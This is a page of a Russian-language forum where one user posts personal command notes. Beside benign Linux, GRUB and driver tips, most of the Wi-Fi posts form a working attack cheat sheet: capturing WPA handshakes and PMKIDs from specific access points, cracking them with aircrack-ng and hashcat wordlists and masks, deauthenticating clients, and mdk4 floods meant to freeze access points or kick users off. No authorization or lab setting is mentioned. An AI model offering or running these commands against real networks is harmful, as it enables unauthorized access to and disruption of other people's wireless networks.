"Форум на сайте Чагадаева"

Пожалуйста, войдите или зарегистрируйтесь.

Расширенный поиск  

Новости:

5 октября 2008 года 20:45
Два дня - ни одного спама. Решил упростить вопрос. :)

Страницы: 1 [2] 3 4 ... 10
 11 
 : 06 Января 2023 года, 23:27 
Автор adc - Последний ответ от adc
Проблема: в произвольный момент времени (или при выходе из игры) экран становится чёрным
Решение: перезагрузить видео-драйвер нажав одновременно [ Ctrl ] + [ Shift ] + [ Win ] + [ B ]

 12 
 : 27 Ноября 2023 года, 21:34 
Автор adc - Последний ответ от adc
Подобрать хэш для пароля из дампа в файле wifi-01.cap
aircrack-ng wifi-01.cap -w /usr/share/dict/wordlist-probable.txt
aircrack-ng wifi-01.cap -w /!Dic/rockyou.txt

Очистить дамп от всех данных, кроме WPA handshake
wpaclean wifi-01_cleaned.cap wifi-01.cap

Конвертировать дамп от airodump-ng в вид, понятный hashcat
Подобрать хеш для пароля из файла wifi-01.hash
hcxpcapngtool wifi-01.cap -o wifi-01.hash
hashcat -m 22000 -a 0 wifi-01.hash /!Dic/rockyou.txt -o wifi-01.hash.result --session my-ses1


• Отдельная тема по hashcat - https://adc.su/forum/index.php?topic=6337

 13 
 : 27 Ноября 2023 года, 21:34 
Автор adc - Последний ответ от adc
Деаутентификация
aireplay-ng wlan1 --deauth 20 -a <MAC точки доступа> -c <MAC подключённого клиента>
mdk4 wlan1 d -c <канал> -E <SSID>
mdk4 wlan1 d -c 1 -E 52:FF:20:90:98:C0

Beacon Flooding (generate many fake APs seen by clients - client confusion, crash network scanners)
mdk4 wlan1 b -a -w nta -m

Authentication DoS (ыimulate many clients - freeze/reset AP)
mdk4 wlan1 a -m -a 52:FF:20:90:98:C0

EAPOL Start Injection (keep AP busy with fake sessions - disable handling of legitimate clients)
mdk4 wlan1 e -t 52:FF:20:90:98:C0

EAPOL Logoff Injection (kick clients from AP)
mdk4 wlan1 e -t 52:FF:20:90:98:C0 -l

 14 
 : 27 Ноября 2023 года, 21:32 
Автор adc - Последний ответ от adc
Захват PMKID

1) Запустить airodump-ng на нужном интерфейсе и канале
2) Одновременно запустить hcxdumptool

airodump-ng wlan1 -c 1 --bssid 54:C2:50:AC:AE:C9 -w wifi
hcxdumptool -i wlan1 -c 149b -w pmkid.cap --filterlist_ap=targetBSSID --filtermode=2
hcxdumptool -i wlan1 -c 149b -w pmkid.cap

 15 
 : 27 Ноября 2023 года, 20:24 
Автор adc - Последний ответ от adc
Список беспроводных сетей (значения столбцов)
  • BSSID — уникальный MAC-адрес беспроводной сети (6 чисел в шестнадцатеричном формате, разделённых двоеточиями).
  • PWR — уровень сигнала, отрицательное число, чем ближе к 0 — тем сигнал сильнее. Для комфортной работы — до -50, для видеосвязи — до -65, для VoIP — до -75. Значения ниже -85 и в особенности ниже -90 можно считать крайне слабым уровнем. Зависит как от мощности передатчика, так и от коэффициента усиления антенны в принимающем адаптере (внешние адаптеры имеют усиление 0-12 dB, внешние 1-2-метровые всенаправленные антенны — до 24 dB).
  • Beacons — число переданных точкой доступа «маячков» — пакетов, оповещающих находящихся рядом устройств о существовании этой беспроводной сети, уровне сигнала, её имени (BSSID/ESSID) и прочей информации. Используется для подключения. Обычно точки доступа передают маячки каждые 100 мсек (10 раз в секунду), но интервал можно увеличить до 1/сек. Отсутствие маячка не говорит об отсутствии беспроводной сети — в скрытом (hidden) режиме точка доступа не передаёт маячков, но к ней можно подключиться, если знать точное имя сети.
  • #Data — число пакетов с данными, которые пришли от этой точки доступа. Это может быть HTTP-трафик, ARP-запросы, запросы на авторизацию (handshake) и прочее. Если к сети не подключен ни один клиент или если он ничего не передаёт, то это значение не меняется и может быть 0.
  • #/s — число пакетов с данными в секунду (значение #Data, делённое на время наблюдения за этой сетью).
  • CH — номер канала.
  • MB — скорость передачи (ширина канала) в Мбит/с. Точка в конце обозначает, что точка доступа поддерживает короткую преамбулу (short preamble). Можно увидеть значения 11, 54, 54e.
  • ENC — тип беспроводной сети — OPN (открытая), WEP, WPA, WPA2.
  • CIPHER — тип шифрования данных после handshake, TKIP или CCMP.
  • AUTH — механизм аутентификации для передачи временного ключа, PSK (обычная авторизация по единому паролю для WPA(2)), MGT (WPA(2) Enterprise с отдельным сервером с ключами RADIUS), OPN (открытая).
  • ESSID — имя беспроводной сети. Так как это пользовательское имя, то оно может не быть уникальным, и для всех внутренних операций используется BSSID, а это — просто отображаемое название.

Список беспроводных сетей и клиентов (значения столбцов)
  • BSSID — MAC-адрес точки доступа, к которой подключён клиент. Если указано "not associated" — клиент отключён от всех сетей, но адаптер работает (возможно, он ищет доступные сети).
  • STATION — MAC-адрес клиента.
  • PWR — уровень сигнала от клиента. Чем ближе к 0, тем клиент ближе/сигнал мощнее.
  • Rate — когда airodump-ng запущен с фиксацией канала, этот столбец показывает частоту передачи пакетов с данными от точки доступа к клиенту (слева от дефиса) и от клиента обратно (справа).
  • Lost — число потерянных пакетов, которые наша система (не клиент) не зарегистрировала. Это легко вычислить, так как в передаваемых пакетах есть счётчик.
  • Frames (Packets) — число пакетов с данными, которые мы уловили от этого клиента (см. #Data в первой таблице).
  • Probe — список ESSID-имён беспроводных сетей, к которым клиент готов подключиться.

★ ★ ★

Горячие клавиши:
"o" - включить цвет
"s" - изменить сортировку

★ ★ ★

Мониторинг эфира - интерфейс wlan1; диапазоны 2,4 ГГц и 5 ГГц; выводить производителя, параметры WPS и время работы точек доступа
airodump-ng wlan1 --band abg --wps --manufacturer --uptime

★ ★ ★

Захват трафика - интерфейс wlan1, канал 1, сохранять пакеты в файл wifi
airodump-ng wlan1 -c 1 -w wifi

Захват трафика - интерфейс wlan1, канал 1, точка доступа с BSSID 54..., сохранять пакеты в файл wifi
airodump-ng wlan1 -c 1 --bssid 54:C2:50:AC:AE:C9 -w wifi

 16 
 : 08 Ноября 2023 года, 15:21 
Автор adc - Последний ответ от adc
Код: (/etc/NetworkManager/NetworkManager.conf) [Выделить]
[connection]                                                                                                                                                 
wifi.cloned-mac-address=stable

 17 
 : 07 Ноября 2023 года, 15:46 
Автор adc - Последний ответ от adc
Режимы работы Wi-Fi адаптера
  • Managed mode (client mode) — пакеты, не предназначенные этому адаптеру, а также повреждённые, отбрасываются, остальные передаются внутрь ОС. Обычный режим работы.
  • Monitor mode (rfmon mode) — драйвер не фильтрует пакеты и передаёт всё, что улавливает антенна, в ОС. Пакеты с неверной контрольной суммой не отбрасываются и их можно увидеть, к примеру, в Wireshark.
  • Promiscuous mode («беспорядочный режим») — драйвер передаёт в ОС пакеты, полученные в рамках сети, к которой мы сейчас подключены (associated), но, в отличие от обычного режима, не отбрасывает пакеты, предназначенные другим клиентам этой сети. Пакеты других сетей игнорируются. Как и в managed mode, драйвер убирает из переданных в ОС пакетов низкоуровневые заголовки канала. Режим работает только когда адаптер уже успешно подключён к некоей сети.

★ ★ ★

Отключить в NetworkManager управление интерфейсом wlan1 - для текущего сеанса
nmcli dev set wlan1 managed no

Отключить в NetworkManager управление интерфейсом wlan1 - в конфигурационном файле
Код: (/etc/NetworkManager/NetworkManager.conf) [Выделить]
[keyfile]
unmanaged-devices=interface-name:wlan1

Посмотреть в каком режиме работают Wi-Fi интерфейсы
iwconfig

Перевести Wi-Fi интерфейс wlan1 в режим мониторинга - средствами ОС
ip link set wlan1 down
iw dev wlan1 set type monitor
ip link set wlan1 up

Перевести Wi-Fi интерфейс wlan1 в режим мониторинга, остановить мешающие процессы - средствами airmon-ng
airmon-ng check kill
airmon-ng start wlan1

Перевести Wi-Fi интерфейс wlan1 в обычный режим - средствами airmon-ng; запустить NetworkManager и wpa_supplicant
airmon-ng stop wlan1
systemctl start NetworkManager
systemctl start wpa_supplicant.service

Перевести Wi-Fi интерфейс wlan1 в обычный режим - средствами ОС
ip link set wlan1 down
iw dev wlan1 set type managed
ip link set wlan1 up
iwconfig

 18 
 : 05 Ноября 2023 года, 20:11 
Автор adc - Последний ответ от adc
Вывести все PCI-устройства, которые видит Linux
lspci

Вывести все USB-устройства, которые видит Linux
lsusb

Установить драйвер из репозитория
apt install realtek-rtl88xxau-dkms

Если в репозитории данного дистрибутива драйвера нет, то придётся самостоятельно скачать его исходники, скомпилировать их и установить драйвер
git clone https://github.com/aircrack-ng/rtl8812au
cd rtl8812au
make
make install

Проверить, что Wi-Fi адаптер поддерживает режим инъекций
# aireplay-ng --test <INTERFACE>
aireplay-ng -9 wlan1

 19 
 : 05 Ноября 2023 года, 13:23 
Автор adc - Последний ответ от adc
Код: (/etc/default/grub) [Выделить]
GRUB_SAVEDEFAULT=true
GRUB_DEFAULT=saved

Выполнить
update-grub
# если такого файла нет, то
grub-mkconfig -o /boot/grub/grub.cfg

 20 
 : 24 Октября 2023 года, 18:29 
Автор adc - Последний ответ от adc
Установка под Windows

Скачать и установить
1. hashcat - https://hashcat.net/hashcat/ (либо beta - https://hashcat.net/beta/)
2.  В зависимости от используемого оборудования
2.1. Видеокарты NVIDIA
2.1.1. Драйверы - https://www.nvidia.com/Download/index.aspx
2.1.2. CUDA Toolkit - https://developer.nvidia.com/cuda-downloads
2.2. Видеокарты, встроенные в процессор Intel - https://www.intel.com/content/www/us/en/download/19344/intel-graphics-windows-dch-drivers.html
2.3. Процессор (Intel или AMD) - Intel CPU Runtime for OpenCL - https://registrationcenter-download.intel.com/akdlm/irc_nas/vcp/17773/w_opencl_runtime_p_2021.2.0.616.exe

★ ★ ★

Вывести информацию об используемых устройствах
hashcat -I

★ ★ ★

Провести тестирование производительности в режиме 22000 (подбор хеша WPA-пароля)
hashcat -m 22000 -b

★ ★ ★

Конвертировать дамп от airodump-ng в вид, понятный hashcat
hcxpcapngtool wifi-01.cap -o wifi-01.hash

★ ★ ★

Подобрать хеш для пароля из файла wifi-01.hash, используя словарь /usr/share/wordlists/rockyou.txt, результат записать в файл wifi-01.hash.result, имя сессии my-ses1
#hashcat -m 22000 -a 0 <файл с хешем> <словарь> -o <файл с подобранным хешем> --session <имя сессии>
hashcat -m 22000 -a 0 wifi-01.hash /usr/share/wordlists/rockyou.txt -o wifi-01.hash.result --session my-ses1

Продолжить сессию my-ses1
hashcat --session my-ses1 --restore

★ ★ ★

Подобрать хеш для пароля из файла wifi-01.hash, длина 8-12 символов, пробовать любые символы
hashcat -m 22000 -a 3 wifi-01.hash -i --increment-min=8 --increment-max=12 ?a?a?a?a?a?a?a?a?a?a?a?a -o wifi-01.hash.result --session my-ses2


Символы, используемые в масках hashcat
  ? | Charset
 ===+=========
  l | abcdefghijklmnopqrstuvwxyz [a-z]
  u | ABCDEFGHIJKLMNOPQRSTUVWXYZ [A-Z]
  d | 0123456789                 [0-9]
  h | 0123456789abcdef           [0-9a-f]
  H | 0123456789ABCDEF           [0-9A-F]
  s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
  a | ?l?u?d?s
  b | 0x00 - 0xff

Страницы: 1 [2] 3 4 ... 10